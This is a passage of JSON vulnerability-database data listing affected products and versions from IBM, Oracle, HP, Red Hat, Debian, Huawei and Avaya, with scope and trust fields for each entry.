"version": "6.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "notes and domino fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "java sdk sr16-fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054540" }, { "model": "db2\u00ae workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.13" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "websphere real time sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3810" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "infosphere optim configuration manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.191" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "db2\u00ae connect? unlimited edition for system z\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "db2\u00ae advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.33" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.12" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "sterling connect:direct browser ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.212" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.1" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "hp870 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.033" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "smb (comware r1105", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "16205)" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.2" }, { "model": "oceanstor v100r001c01spc210", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "db2\u00ae enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system networking rackswitch g8332", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.7.19.0" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "tivoli network manager ip edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jre 1.6.0 31", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "clustered data ontap rc1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "db2 query management facility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.1" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.13" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.2.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.61" }, { "model": "db2\u00ae advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.72" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.302" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "rational build utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "cognos controller fp1 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.060" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "(comware r3108p03", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51307)" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.14" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3" }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "jdk update21", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.34" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.10" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.5" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "java sdk sr13-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "hi (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "oceanstor s5800t v200r001c00spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "openjdk", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.014" }, { "model": "ultravr v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355042540" }, { "model": "flex system chassis management module 2pet10i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "endpoint manager for security configuration management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "jrockit r27.8.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "network advisor", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "12.4.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59507)0" }, { "model": "rc4", "scope": "eq", "trust": 0.3, "vendor": "rsa", "version": "0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.77" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.10" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli monitoring fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.6" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.28" }, { "model": "data server runtime client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.70" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.030" }, { "model": "java sdk sr13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.209" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.41" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.015" }, { "model": "smc2.0 v100r002c04", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "enterprise linux server eus 6.6.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0.4" }, { "model": "infosphere discovery", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.051" }, { "model": "msr2000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "flex system chassis management module 2pet12p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "f1000-e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "policy center v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.42" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "system storage ts3400 tape library", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "0053" }, { "model": "java sdk 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "db2\u00ae connect? unlimited edition for system z\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "flex system chassis management module 2pet10g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.13" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "tivoli monitoring for tivoli storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r27.7.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.30" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "tivoli storage productivity center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.3" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.9" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.45" }, { "model": "jrockit r28.3.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server community edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "data server driver package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "jre update5", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "cognos controller if4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "rational sap connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.8" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.2" }, { "model": "data server client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.035" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "db2 connect unlimited edition for system i fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.03" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "jdk update11", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "java sdk sr3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "flex system chassis management module 2pete6l", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.026" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "cognos business viewpoint fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.2" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "communications policy management", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "9.9.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.52" }, { "model": "system networking rackswitch g8316", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.9" }, { "model": "cognos business viewpoint if4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.0.1" }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.33" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.15" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": 